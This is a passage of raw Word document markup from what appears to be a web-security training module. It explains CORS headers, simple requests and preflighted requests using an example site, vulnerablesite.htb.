          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, define Same-Origin policy exceptions even if the cross-origin request contains credentials, i.e., cookies or an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> header</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hyperlink r:id="rId20" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Max-Age" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Access-Control-Max-Age</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: define for how long the information in the other CORS-headers can be cached without issuing a new preflight request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most straightforward CORS configuration is that of a so-called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">simple request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which can be made from plain HTML, without any script code. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Simple requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET</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HEAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests without any custom HTTP headers as well as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests without any custom HTTP headers and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of either </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">application/x-www-form-urlencoded</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multipart/form-data</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text/plain</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our example, fetching data is implemented in a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://api.vulnerablesite.htb/data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is a simple request as it fulfills the above conditions. Therefore, the API must only configure an exception for the requesting origin by setting the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> header in all API responses.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Afterward, the web application at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://vulnerablesite.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> can read the response from the cross-origin request. Here is the cross-origin request as well as the response in Burp:</w:t>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inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="119749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05040" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId21"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="11974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94.29pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId21" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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Preflight Requests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All requests that do not fall under the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">simple requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> conditions are called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preflighted requests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Before sending these cross-origin requests, the browser sends a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preflight request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the different origin containing all the parameters of the actual cross-origin request. This enables the web server to decide whether to allow the cross-origin request. The browser waits for the response to the preflight request and only continues to se</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nd the actual cross-origin request if the web server allows it by setting the corresponding CORS headers in response to the preflight request. Since the browser asks the web server for permission before sending the actual cross-origin request, CSRF vulnera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">bilities with preflighted requests are impossible.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preflight request is an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OPTIONS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> request that contains the following headers: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hyperlink r:id="rId22" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Request-Method" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Access-Control-Request-Method</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: inform the server about the HTTP method used in the actual request</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hyperlink r:id="rId23" w:tooltip="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Request-Headers" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="174"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000ee"/>
            <w:sz w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Access-Control-Request-Headers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: inform the server about the HTTP headers used in the actual request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For example, if the API needs to accept JSON data in a POST request from the web application, a simple request is insufficient because the Content-Type is set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">application/json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is not allowed in a simple request. Thus, the browser will send a preflight request before sending the actual request. The API needs to set the CORS response headers accordingly to tell the browser it allows the cross-origin request. More specifica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lly, it must allow the origin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">http://vulnerablesite.htb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, the method </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the header </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Type</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With the CORS headers configured correctly, the web application and API can talk to each other without Same-Origin policy issues. Suppose a user wants to create a new data item with a POST request; the user's browser will first send a preflight request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">check if the API allows the potentially dangerous cross-origin request:</w:t>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inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="119099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17221" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId24"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="11909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93.78pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId24"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Since the response contains the correct CORS headers, the browser knows that the API allows the preflighted request; therefore, it continues with sending it:</w:t>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inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5940425" cy="14092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63901" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId25"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5940424" cy="14092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110.96pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId25"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Since this request also contains a CORS header with the requesting origin, the browser adds an exception for the Same-Origin policy so that the web application can access the response and check the result of the operation (in this case, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Success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enable a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> request for updating data and a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> request for deleting data, the API must adjust the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Methods</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORS header in the response to the preflight request to include all permitted methods.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eveloper.mozilla.org/en-US/docs/Web/Security/Same-origin_policy" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://datatracker.ietf.org/doc/html/rfc6454"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developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Expose-Headers" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Methods" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Headers" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Max-Age" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Request-Method" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Request-Headers" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId2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2024-06-03T16:10:29Z</dcterms:modified>
</cp:coreProperties>
</file>